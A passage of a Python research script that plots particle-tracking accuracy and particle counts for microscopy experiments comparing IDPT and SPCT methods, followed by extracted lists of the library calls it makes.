ax.set_ylabel(r'$\sigma_{z} \: (\mu m)$')
ax.legend()
plt.tight_layout()
if save_plots:
plt.savefig(path_figs + '/compare-on-edge-off-bpe_rmse-z_microns.png')
if show_plots:
plt.show()
plt.close()
# rmse-z (microns) + c_m
darken_clr = 1.0
alpha_clr = 1.0
fig, [axr, ax] = plt.subplots(nrows=2, sharex=True, gridspec_kw={'height_ratios': [1, 2]})
axr.plot(df3.bin, df3.cm, '-', ms=ms-2, marker=markers[2], color=sciblue)
axr.plot(df2.bin, df2.cm, '-', ms=ms-2, marker=markers[1], color=scired)
axr.plot(df1.bin, df1.cm, '-', ms=ms-2, marker=markers[0], color=sciorange)
axr.set_ylabel(r'$c_{m}$')
ax.plot(df3.bin, df3.rmse_z, '-', ms=ms-0.75, marker=markers[2], color=sciblue, label=lbls[2])
ax.plot(df2.bin, df2.rmse_z, '-', ms=ms-0.75, marker=markers[1], color=scired, label=lbls[1])
ax.plot(df1.bin, df1.rmse_z, '-', ms=ms-0.75, marker=markers[0], color=sciorange, label=lbls[0])
ax.set_xlabel(r'$z_{true} \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(ticks=xyticks, labels=xyticks)
ax.set_ylabel(r'$\sigma_{z} \: (\mu m)$')
ax.legend()
plt.tight_layout()
if save_plots:
plt.savefig(path_figs + '/compare-on-edge-off-bpe_rmse-z_microns_cm.png')
if show_plots:
plt.show()
plt.close()
# ----------------------------------------------------------------------------------------------------------------------
# 5. IDPT VS. SPCT - COMPARE NUMBER OF PARTICLES PER Z
compare_idpt_spct = False
save_plots = False
show_plots = False
if compare_idpt_spct:
# --- 1. IDPT
# read IDPT test coords
dft = io.read_test_coords(path_test_coords)
# test coords stats
mag_eff = 20.0
area_pixels = 512 ** 2
area_microns = (512 * microns_per_pixel) ** 2
i_num_rows = len(dft)
i_num_pids = len(dft.id.unique())
dft = dft.drop(columns=['z', 'z_true'])
dft = dft.rename(columns={'z_corr': 'z', 'z_true_corr': 'z_true'})
# --- 2. SPCT
# 2.1 read SPCT off-bpe test coords
dfs_off = pd.read_excel('/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/results-04.26.22_spct_calib1_test-2-3/coords/test-coords/test_coords_t-calib2_c-calib1.xlsx')
dfs_on = pd.read_excel('/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/results-04.26.22_spct_stack-id-on-bpe/testcalib2_calcalib1/test_coords_t_20X_ccalib1_tcalib2_c_20X_tcalib2_ccalib1_2022-04-26 20:45:34.334931.xlsx')
# 2.2 correct z by mean z_f from peak_intensity
z_f_mean = 35.1
dfs_off['z'] = dfs_off['z'] - z_f_mean
dfs_off['z_true'] = dfs_off['z_true'] - z_f_mean
dfs_on['z'] = dfs_on['z'] - z_f_mean
dfs_on['z_true'] = dfs_on['z_true'] - z_f_mean
# --- 3. GROUPBY Z_TRUE
dftg = dft.copy()
dftg = dftg.round({'z_true': 0})
dftc = dftg.groupby('z_true').count().reset_index()
dfs_offc = dfs_off.groupby('z_true').count().reset_index()
dfs_onc = dfs_on.groupby('z_true').count().reset_index()
# filter z_true for pretty plotting
zlim = 35
dftc = dftc[(dftc['z_true'] > -zlim) & (dftc['z_true'] < zlim)]
dfs_offc = dfs_offc[(dfs_offc['z_true'] > -zlim) & (dfs_offc['z_true'] < zlim)]
dfs_onc = dfs_onc[(dfs_onc['z_true'] > -zlim) & (dfs_onc['z_true'] < zlim)]
# ---
# --- plotting
# format plots
xylim = 37.25
xyticks = [-30, -15, 0, 15, 30]
ms = 3
# FIGURE 1. PLOT NUMBER OF PARTICLES PER Z_TRUE
fig, ax = plt.subplots()
ax.plot(dftc.z_true, dftc.z, '-o', ms=ms, color=sciblue, label=r'$IDPT$')
ax.plot(dfs_offc.z_true, dfs_offc.z, '-o', ms=ms, color=lighten_color(scigreen, 1.0), label=r'$SPCT_{Low}$')
ax.plot(dfs_onc.z_true, dfs_onc.z, '-o', ms=ms, color=lighten_color(scigreen, 1.2), label=r'$SPCT_{High}$')
ax.set_xlabel(r'$z \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(xyticks)
ax.set_ylabel(r'$N_{p} \: (\#)$')
ax.set_ylim([0, 200])
ax.legend()
plt.tight_layout()
if save_plots:
plt.savefig(path_figs + '/compare-idpt-spct_num-particles.png')
if show_plots:
plt.show()
plt.close()
# ---
# FIGURE 2. PLOT NUMBER OF PARTICLES PER Z_TRUE AND CM
dftm = dftg.groupby('z_true').mean().reset_index()
dfs_offm = dfs_off.groupby('z_true').mean().reset_index()
dfs_onm = dfs_on.groupby('z_true').mean().reset_index()
# filter z_true for pretty plotting
dftm = dftm[(dftm['z_true'] > -zlim) & (dftm['z_true'] < zlim)]
dfs_offm = dfs_offm[(dfs_offm['z_true'] > -zlim) & (dfs_offm['z_true'] < zlim)]
dfs_onm = dfs_onm[(dfs_onm['z_true'] > -zlim) & (dfs_onm['z_true'] < zlim)]
# plot
fig, [axr, ax] = plt.subplots(nrows=2, sharex=True, gridspec_kw={'height_ratios': [1, 2]})
axr.plot(dftm.z_true, dftm.cm, '-o', ms=ms - 1, color=sciblue)
axr.plot(dfs_offm.z_true, dfs_offm.cm, '-o', ms=ms - 1, color=lighten_color(scigreen, 1.0))
axr.plot(dfs_onm.z_true, dfs_onm.cm, '-o', ms=ms - 1, color=lighten_color(scigreen, 1.2))
axr.set_ylabel(r'$c_{m}$')
axr.set_ylim([0.790, 1.01])
axr.set_yticks([0.8, 0.9, 1.0])
ax.plot(dftc.z_true, dftc.z, '-o', ms=ms, color=sciblue, label=r'$IDPT$')
ax.plot(dfs_offc.z_true, dfs_offc.z, '-o', ms=ms, color=lighten_color(scigreen, 1.0), label=r'$SPCT_{Low}$')
ax.plot(dfs_onc.z_true, dfs_onc.z, '-o', ms=ms, color=lighten_color(scigreen, 1.2), label=r'$SPCT_{High}$')
ax.set_xlabel(r'$z \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(xyticks)
ax.set_ylabel(r'$N_{p} \: (\#)$')
ax.set_ylim([0, 185])
ax.set_yticks([0, 50, 100, 150])
ax.legend()
plt.tight_layout()
if save_plots:
plt.savefig(path_figs + '/compare-idpt-spct_num-particles_and_cm.png')
if show_plots:
plt.show()
plt.close()
# ----------------------------------------------------------------------------------------------------------------------
# 6. AVERAGE PARTICLE-TO-PARTICLE SIMILARITY PER-FRAME
plot_average_particle_similarity = False
if plot_average_particle_similarity:
# setup
save_plots = True
xylim = 37.25
xyticks = [-30, -15, 0, 15, 30]
ms = 3
# read dataframe
fp = join(base_dir, 'average-particle-similarity/'
'average_similarity_SPCT_11.02.21-BPE_Pressure_Deflection_20X_c-calib1_t-calib2.xlsx')
dfsim = pd.read_excel(fp)
# plot
fig, ax = plt.subplots()
ax.plot(dfsim.z_corr, dfsim.sim, '-o', ms=ms)
ax.set_xlabel(r'$z \: (\mu m)$')
ax.set_xlim([-xylim, xylim])
ax.set_xticks(xyticks)
ax.set_ylabel(r'$S (p_{i}, p_{N})$')
ax.set_ylim([0.49, 1.01])
plt.tight_layout()
if save_plots:
plt.savefig(path_figs + '/average-particle-to-particle-similarity.png')
plt.show()
plt.close()
print("Analysis completed without errors.")
|
[
"utils.plotting.lighten_color",
"utils.functions.line",
"utils.io.read_calib_coords",
"utils.plotting.scatter_3d_and_spline",
"matplotlib.pyplot.style.use",
"matplotlib.pyplot.tight_layout",
"os.path.join",
"numpy.round",
"utils.bin.bin_by_list",
"matplotlib.pyplot.close",
"utils.plotting.plot_fitted_plane_and_points",
"correction.correct.fit_in_focus_plane",
"matplotlib.pyplot.subplots",
"utils.fit.fit_3d_spline",
"matplotlib.pyplot.show",
"pandas.DataFrame.from_dict",
"scipy.optimize.curve_fit",
"pandas.read_excel",
"correction.correct.correct_z_by_spline",
"utils.bin.bin_local_rmse_z",
"utils.bin.bin_generic",
"utils.modify.merge_calib_pid_defocus_and_correction_coords",
"utils.io.read_test_coords",
"matplotlib.pyplot.savefig"
] |
[((681, 729), 'matplotlib.pyplot.style.use', 'plt.style.use', (["['science', 'ieee', 'std-colors']"], {}), "(['science', 'ieee', 'std-colors'])\n", (694, 729), True, 'import matplotlib.pyplot as plt\n'), ((740, 754), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (752, 754), True, 'import matplotlib.pyplot as plt\n'), ((808, 822), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (817, 822), True, 'import matplotlib.pyplot as plt\n'), ((1247, 1286), 'os.path.join', 'join', (['base_dir', '"""results-04.26.22_idpt"""'], {}), "(base_dir, 'results-04.26.22_idpt')\n", (1251, 1286), False, 'from os.path import join\n'), ((1306, 1343), 'os.path.join', 'join', (['path_idpt', '"""coords/test-coords"""'], {}), "(path_idpt, 'coords/test-coords')\n", (1310, 1343), False, 'from os.path import join\n'), ((1364, 1402), 'os.path.join', 'join', (['path_idpt', '"""coords/calib-coords"""'], {}), "(path_idpt, 'coords/calib-coords')\n", (1368, 1402), False, 'from os.path import join\n'), ((1421, 1450), 'os.path.join', 'join', (['path_idpt', '"""similarity"""'], {}), "(path_idpt, 'similarity')\n", (1425, 1450), False, 'from os.path import join\n'), ((1466, 1492), 'os.path.join', 'join', (['path_idpt', '"""results"""'], {}), "(path_idpt, 'results')\n", (1470, 1492), False, 'from os.path import join\n'), ((1505, 1528), 'os.path.join', 'join', (['path_idpt', '"""figs"""'], {}), "(path_idpt, 'figs')\n", (1509, 1528), False, 'from os.path import join\n'), ((13148, 13185), 'utils.io.read_test_coords', 'io.read_test_coords', (['path_test_coords'], {}), '(path_test_coords)\n', (13167, 13185), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((27923, 27960), 'utils.io.read_test_coords', 'io.read_test_coords', (['path_test_coords'], {}), '(path_test_coords)\n', (27942, 27960), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((28335, 28559), 'pandas.read_excel', 'pd.read_excel', (['"""/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/results-04.26.22_spct_calib1_test-2-3/coords/test-coords/test_coords_t-calib2_c-calib1.xlsx"""'], {}), "(\n '/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/results-04.26.22_spct_calib1_test-2-3/coords/test-coords/test_coords_t-calib2_c-calib1.xlsx'\n )\n", (28348, 28559), True, 'import pandas as pd\n'), ((28563, 28842), 'pandas.read_excel', 'pd.read_excel', (['"""/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/results-04.26.22_spct_stack-id-on-bpe/testcalib2_calcalib1/test_coords_t_20X_ccalib1_tcalib2_c_20X_tcalib2_ccalib1_2022-04-26 20:45:34.334931.xlsx"""'], {}), "(\n '/Users/mackenzie/Desktop/gdpyt-characterization/experiments/11.02.21-BPE_Pressure_Deflection_20X/analyses/results-04.26.22_spct_stack-id-on-bpe/testcalib2_calcalib1/test_coords_t_20X_ccalib1_tcalib2_c_20X_tcalib2_ccalib1_2022-04-26 20:45:34.334931.xlsx'\n )\n", (28576, 28842), True, 'import pandas as pd\n'), ((29834, 29848), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (29846, 29848), True, 'import matplotlib.pyplot as plt\n'), ((30336, 30354), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (30352, 30354), True, 'import matplotlib.pyplot as plt\n'), ((30488, 30499), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (30497, 30499), True, 'import matplotlib.pyplot as plt\n'), ((31056, 
31129), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(2)', 'sharex': '(True)', 'gridspec_kw': "{'height_ratios': [1, 2]}"}), "(nrows=2, sharex=True, gridspec_kw={'height_ratios': [1, 2]})\n", (31068, 31129), True, 'import matplotlib.pyplot as plt\n'), ((32011, 32029), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (32027, 32029), True, 'import matplotlib.pyplot as plt\n'), ((32170, 32181), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (32179, 32181), True, 'import matplotlib.pyplot as plt\n'), ((32571, 32709), 'os.path.join', 'join', (['base_dir', '"""average-particle-similarity/average_similarity_SPCT_11.02.21-BPE_Pressure_Deflection_20X_c-calib1_t-calib2.xlsx"""'], {}), "(base_dir,\n 'average-particle-similarity/average_similarity_SPCT_11.02.21-BPE_Pressure_Deflection_20X_c-calib1_t-calib2.xlsx'\n )\n", (32575, 32709), False, 'from os.path import join\n'), ((32740, 32757), 'pandas.read_excel', 'pd.read_excel', (['fp'], {}), '(fp)\n', (32753, 32757), True, 'import pandas as pd\n'), ((32784, 32798), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (32796, 32798), True, 'import matplotlib.pyplot as plt\n'), ((33024, 33042), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (33040, 33042), True, 'import matplotlib.pyplot as plt\n'), ((33146, 33156), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (33154, 33156), True, 'import matplotlib.pyplot as plt\n'), ((33161, 33172), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (33170, 33172), True, 'import matplotlib.pyplot as plt\n'), ((2505, 2552), 'utils.io.read_calib_coords', 'io.read_calib_coords', (['path_calib_coords', 'method'], {}), '(path_calib_coords, method)\n', (2525, 2552), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((2937, 3035), 'correction.correct.fit_in_focus_plane', 'correct.fit_in_focus_plane', ([], {'df': 'dfcpid', 'param_zf': 'param_zf', 'microns_per_pixel': 'microns_per_pixel'}), '(df=dfcpid, param_zf=param_zf, microns_per_pixel=\n microns_per_pixel)\n', (2963, 3035), False, 'from correction import correct\n'), ((3623, 3698), 'utils.fit.fit_3d_spline', 'fit.fit_3d_spline', ([], {'x': 'dfcpid.x', 'y': 'dfcpid.y', 'z': 'dfcpid[param_zf]', 'kx': 'kx', 'ky': 'ky'}), '(x=dfcpid.x, y=dfcpid.y, z=dfcpid[param_zf], kx=kx, ky=ky)\n', (3640, 3698), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((4636, 4673), 'utils.io.read_test_coords', 'io.read_test_coords', (['path_test_coords'], {}), '(path_test_coords)\n', (4655, 4673), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((4892, 4952), 'correction.correct.correct_z_by_spline', 'correct.correct_z_by_spline', (['dft'], {'bispl': 'bispl_c', 'param_z': '"""z"""'}), "(dft, bispl=bispl_c, param_z='z')\n", (4919, 4952), False, 'from correction import correct\n'), ((14030, 14224), 'utils.bin.bin_local_rmse_z', 'bin.bin_local_rmse_z', (['dft'], {'column_to_bin': 'column_to_bin', 'bins': '(1)', 'min_cm': 'min_cm', 'z_range': 'None', 'round_to_decimal': 'round_z_to_decimal', 'df_ground_truth': 'None', 'dropna': '(True)', 'error_column': '"""error"""'}), "(dft, column_to_bin=column_to_bin, bins=1, min_cm=\n min_cm, z_range=None, round_to_decimal=round_z_to_decimal,\n df_ground_truth=None, dropna=True, error_column='error')\n", (14050, 14224), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((14733, 14932), 
'utils.bin.bin_local_rmse_z', 'bin.bin_local_rmse_z', (['dft'], {'column_to_bin': 'column_to_bin', 'bins': 'bins_z', 'min_cm': 'min_cm', 'z_range': 'None', 'round_to_decimal': 'round_z_to_decimal', 'df_ground_truth': 'None', 'dropna': '(True)', 'error_column': '"""error"""'}), "(dft, column_to_bin=column_to_bin, bins=bins_z, min_cm=\n min_cm, z_range=None, round_to_decimal=round_z_to_decimal,\n df_ground_truth=None, dropna=True, error_column='error')\n", (14753, 14932), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((15441, 15579), 'utils.bin.bin_generic', 'bin.bin_generic', (['dft'], {'column_to_bin': '"""bin"""', 'column_to_count': '"""id"""', 'bins': 'bins_z', 'round_to_decimal': 'round_z_to_decimal', 'return_groupby': '(True)'}), "(dft, column_to_bin='bin', column_to_count='id', bins=bins_z,\n round_to_decimal=round_z_to_decimal, return_groupby=True)\n", (15456, 15579), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((18493, 18596), 'utils.bin.bin_by_list', 'bin.bin_by_list', (['dft'], {'column_to_bin': 'column_to_bin', 'bins': 'bins_x', 'round_to_decimal': 'round_x_to_decimal'}), '(dft, column_to_bin=column_to_bin, bins=bins_x,\n round_to_decimal=round_x_to_decimal)\n', (18508, 18596), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((19018, 19032), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (19030, 19032), True, 'import matplotlib.pyplot as plt\n'), ((19664, 19682), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (19680, 19682), True, 'import matplotlib.pyplot as plt\n'), ((19838, 19849), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (19847, 19849), True, 'import matplotlib.pyplot as plt\n'), ((25021, 25058), 'os.path.join', 'join', (['path_results', '"""on-edge-off-bpe"""'], {}), "(path_results, 'on-edge-off-bpe')\n", (25025, 25058), False, 'from os.path import join\n'), ((30382, 30445), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/compare-idpt-spct_num-particles.png')"], {}), "(path_figs + '/compare-idpt-spct_num-particles.png')\n", (30393, 30445), True, 'import matplotlib.pyplot as plt\n'), ((30473, 30483), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (30481, 30483), True, 'import matplotlib.pyplot as plt\n'), ((32057, 32127), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/compare-idpt-spct_num-particles_and_cm.png')"], {}), "(path_figs + '/compare-idpt-spct_num-particles_and_cm.png')\n", (32068, 32127), True, 'import matplotlib.pyplot as plt\n'), ((32155, 32165), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (32163, 32165), True, 'import matplotlib.pyplot as plt\n'), ((33070, 33141), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/average-particle-to-particle-similarity.png')"], {}), "(path_figs + '/average-particle-to-particle-similarity.png')\n", (33081, 33141), True, 'import matplotlib.pyplot as plt\n'), ((3127, 3212), 'utils.plotting.plot_fitted_plane_and_points', 'plotting.plot_fitted_plane_and_points', ([], {'df': 'dfcpid', 'dict_fit_plane': 'dictc_fit_plane'}), '(df=dfcpid, dict_fit_plane=dictc_fit_plane\n )\n', (3164, 3212), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((3220, 3283), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/idpt-calib-coords_fit-plane_raw.png')"], {}), "(path_figs + '/idpt-calib-coords_fit-plane_raw.png')\n", (3231, 3283), True, 'import 
matplotlib.pyplot as plt\n'), ((3296, 3307), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (3305, 3307), True, 'import matplotlib.pyplot as plt\n'), ((3339, 3413), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['dictc_fit_plane'], {'orient': '"""index"""', 'columns': "['value']"}), "(dictc_fit_plane, orient='index', columns=['value'])\n", (3361, 3413), True, 'import pandas as pd\n'), ((3928, 4056), 'utils.plotting.scatter_3d_and_spline', 'plotting.scatter_3d_and_spline', (['dfcpid.x', 'dfcpid.y', 'dfcpid[param_zf]', 'bispl_c'], {'cmap': '"""RdBu"""', 'grid_resolution': '(30)', 'view': '"""multi"""'}), "(dfcpid.x, dfcpid.y, dfcpid[param_zf],\n bispl_c, cmap='RdBu', grid_resolution=30, view='multi')\n", (3958, 4056), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((4574, 4585), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (4583, 4585), True, 'import matplotlib.pyplot as plt\n'), ((5904, 5979), 'os.path.join', 'join', (['base_dir', '"""results-04.26.22_spct_calib1_test-2-3/coords/calib-coords"""'], {}), "(base_dir, 'results-04.26.22_spct_calib1_test-2-3/coords/calib-coords')\n", (5908, 5979), False, 'from os.path import join\n'), ((6013, 6100), 'os.path.join', 'join', (['path_spct_calib_coords', '"""calib_spct_pid_defocus_stats_c-calib1_t-calib2.xlsx"""'], {}), "(path_spct_calib_coords,\n 'calib_spct_pid_defocus_stats_c-calib1_t-calib2.xlsx')\n", (6017, 6100), False, 'from os.path import join\n'), ((6129, 6200), 'os.path.join', 'join', (['path_spct_calib_coords', '"""calib_spct_stats_c-calib1_t-calib2.xlsx"""'], {}), "(path_spct_calib_coords, 'calib_spct_stats_c-calib1_t-calib2.xlsx')\n", (6133, 6200), False, 'from os.path import join\n'), ((6231, 6318), 'os.path.join', 'join', (['path_spct_calib_coords', '"""calib_spct_pop_defocus_stats_c-calib1_t-calib2.xlsx"""'], {}), "(path_spct_calib_coords,\n 'calib_spct_pop_defocus_stats_c-calib1_t-calib2.xlsx')\n", (6235, 6318), False, 'from os.path import join\n'), ((6401, 6473), 'os.path.join', 'join', (['base_dir', '"""results-04.28.22_spct-calib2_test3/coords/calib-coords"""'], {}), "(base_dir, 'results-04.28.22_spct-calib2_test3/coords/calib-coords')\n", (6405, 6473), False, 'from os.path import join\n'), ((6506, 6592), 'os.path.join', 'join', (['path_spct_test_coords', '"""calib_spct_pid_defocus_stats_c-calib2_t-calib3.xlsx"""'], {}), "(path_spct_test_coords,\n 'calib_spct_pid_defocus_stats_c-calib2_t-calib3.xlsx')\n", (6510, 6592), False, 'from os.path import join\n'), ((6620, 6690), 'os.path.join', 'join', (['path_spct_test_coords', '"""calib_spct_stats_c-calib2_t-calib3.xlsx"""'], {}), "(path_spct_test_coords, 'calib_spct_stats_c-calib2_t-calib3.xlsx')\n", (6624, 6690), False, 'from os.path import join\n'), ((6720, 6806), 'os.path.join', 'join', (['path_spct_test_coords', '"""calib_spct_pop_defocus_stats_c-calib2_t-calib3.xlsx"""'], {}), "(path_spct_test_coords,\n 'calib_spct_pop_defocus_stats_c-calib2_t-calib3.xlsx')\n", (6724, 6806), False, 'from os.path import join\n'), ((8357, 8455), 'correction.correct.fit_in_focus_plane', 'correct.fit_in_focus_plane', ([], {'df': 'dfcpid', 'param_zf': 'param_zf', 'microns_per_pixel': 'microns_per_pixel'}), '(df=dfcpid, param_zf=param_zf, microns_per_pixel=\n microns_per_pixel)\n', (8383, 8455), False, 'from correction import correct\n'), ((11256, 11354), 'correction.correct.fit_in_focus_plane', 'correct.fit_in_focus_plane', ([], {'df': 'dfcpid', 'param_zf': 'param_zf', 'microns_per_pixel': 'microns_per_pixel'}), '(df=dfcpid, 
param_zf=param_zf, microns_per_pixel=\n microns_per_pixel)\n', (11282, 11354), False, 'from correction import correct\n'), ((15914, 15930), 'matplotlib.pyplot.close', 'plt.close', (['"""all"""'], {}), "('all')\n", (15923, 15930), True, 'import matplotlib.pyplot as plt\n'), ((16042, 16056), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (16054, 16056), True, 'import matplotlib.pyplot as plt\n'), ((16328, 16346), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (16344, 16346), True, 'import matplotlib.pyplot as plt\n'), ((16503, 16514), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (16512, 16514), True, 'import matplotlib.pyplot as plt\n'), ((16626, 16676), 'scipy.optimize.curve_fit', 'curve_fit', (['functions.line', 'dfrmse.z_true', 'dfrmse.z'], {}), '(functions.line, dfrmse.z_true, dfrmse.z)\n', (16635, 16676), False, 'from scipy.optimize import curve_fit\n'), ((17003, 17017), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (17015, 17017), True, 'import matplotlib.pyplot as plt\n'), ((17794, 17812), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (17810, 17812), True, 'import matplotlib.pyplot as plt\n'), ((18275, 18286), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (18284, 18286), True, 'import matplotlib.pyplot as plt\n'), ((19718, 19783), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(path_figs + '/on-edge-off-bpe_calibration_curve.png')"], {}), "(path_figs + '/on-edge-off-bpe_calibration_curve.png')\n", (19729, 19783), True, 'import matplotlib.pyplot as plt\n'), ((19819, 19829), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (19827, 19829), True, 'import matplotlib.pyplot as plt\n'), ((20235, 20429), 'utils.bin.bin_local_rmse_z', 'bin.bin_local_rmse_z', (['dft'], {'column_to_bin': 'column_to_bin', 'bins': '(1)', 'min_cm': 'min_cm', 'z_range': 'None', 'round_to_decimal': 'round_z_to_decimal', 'df_ground_truth': 'None', 'dropna': '(True)', 'error_column': '"""error"""'}), "(dft, column_to_bin=column_to_bin, bins=1, min_cm=\n min_cm, z_range=None, round_to_decimal=round_z_to_decimal,\n df_ground_truth=None, dropna=True, error_column='error')\n", (20255, 20429), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((21001, 21200), 'utils.bin.bin_local_rmse_z', 'bin.bin_local_rmse_z', (['dft'], {'column_to_bin': 'column_to_bin', 'bins': 'bins_z', 'min_cm': 'min_cm', 'z_range': 'None', 'round_to_decimal': 'round_z_to_decimal', 'df_ground_truth': 'None', 'dropna': '(True)', 'error_column': '"""error"""'}), "(dft, column_to_bin=column_to_bin, bins=bins_z, min_cm=\n min_cm, z_range=None, round_to_decimal=round_z_to_decimal,\n df_ground_truth=None, dropna=True, error_column='error')\n", (21021, 21200), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((21765, 21903), 'utils.bin.bin_generic', 'bin.bin_generic', (['dft'], {'column_to_bin': '"""bin"""', 'column_to_count': '"""id"""', 'bins': 'bins_z', 'round_to_decimal': 'round_z_to_decimal', 'return_groupby': '(True)'}), "(dft, column_to_bin='bin', column_to_count='id', bins=bins_z,\n round_to_decimal=round_z_to_decimal, return_groupby=True)\n", (21780, 21903), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((25601, 25615), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (25613, 25615), True, 'import matplotlib.pyplot as plt\n'), ((26112, 26130), 'matplotlib.pyplot.tight_layout', 
'plt.tight_layout', ([], {}), '()\n', (26128, 26130), True, 'import matplotlib.pyplot as plt\n'), ((26311, 26322), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (26320, 26322), True, 'import matplotlib.pyplot as plt\n'), ((26448, 26521), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(2)', 'sharex': '(True)', 'gridspec_kw': "{'height_ratios': [1, 2]}"}), "(nrows=2, sharex=True, gridspec_kw={'height_ratios': [1, 2]})\n", (26460, 26521), True, 'import matplotlib.pyplot as plt\n'), ((27385, 27403), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (27401, 27403), True, 'import matplotlib.pyplot as plt\n'), ((27587, 27598), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (27596, 27598), True, 'import matplotlib.pyplot as plt\n'), ((29988, 30016), 'utils.plotting.lighten_color', 'lighten_color', (['scigreen', '(1.0)'], {}), '(scigreen, 1.0)\n', (30001, 30016), False, 'from utils.plotting import lighten_color\n'), ((30099, 30127), 'utils.plotting.lighten_color', 'lighten_color', (['scigreen', '(1.2)'], {}), '(scigreen, 1.2)\n', (30112, 30127), False, 'from utils.plotting import lighten_color\n'), ((31264, 31292), 'utils.plotting.lighten_color', 'lighten_color', (['scigreen', '(1.0)'], {}), '(scigreen, 1.0)\n', (31277, 31292), False, 'from utils.plotting import lighten_color\n'), ((31358, 31386), 'utils.plotting.lighten_color', 'lighten_color', (['scigreen', '(1.2)'], {}), '(scigreen, 1.2)\n', (31371, 31386), False, 'from utils.plotting import lighten_color\n'), ((31626, 31654), 'utils.plotting.lighten_color', 'lighten_color', (['scigreen', '(1.0)'], {}), '(scigreen, 1.0)\n', (31639, 31654), False, 'from utils.plotting import lighten_color\n'), ((31737, 31765), 'utils.plotting.lighten_color', 'lighten_color', (['scigreen', '(1.2)'], {}), '(scigreen, 1.2)\n', (31750, 31765), False, 'from utils.plotting import lighten_color\n'), ((7362, 7399), 'pandas.read_excel', 'pd.read_excel', (['path_calib_pid_defocus'], {}), '(path_calib_pid_defocus)\n', (7375, 7399), True, 'import pandas as pd\n'), ((7423, 7459), 'pandas.read_excel', 'pd.read_excel', (['path_calib_spct_stats'], {}), '(path_calib_spct_stats)\n', (7436, 7459), True, 'import pandas as pd\n'), ((7481, 7588), 'utils.modify.merge_calib_pid_defocus_and_correction_coords', 'modify.merge_calib_pid_defocus_and_correction_coords', (['path_calib_coords', 'method'], {'dfs': '[dfcstats, dfcpid]'}), '(path_calib_coords,\n method, dfs=[dfcstats, dfcpid])\n', (7533, 7588), False, 'from utils import fit, functions, bin, io, plotting, modify, plot_collections\n'), ((7814, 7884), 'os.path.join', 'join', (['path_calib_coords', '"""calib_spct_pid_defocus_stats_calib1_xy.xlsx"""'], {}), "(path_calib_coords, 'calib_spct_pid_defocus_stats_calib1_xy.xlsx')\n", (7818, 7884), False, 'from os.path import join\n'), ((7906, 7943), 'pandas.read_excel', 'pd.read_excel', (['path_calib_pid_defocus'], {}), '(path_calib_pid_defocus)\n', (7919, 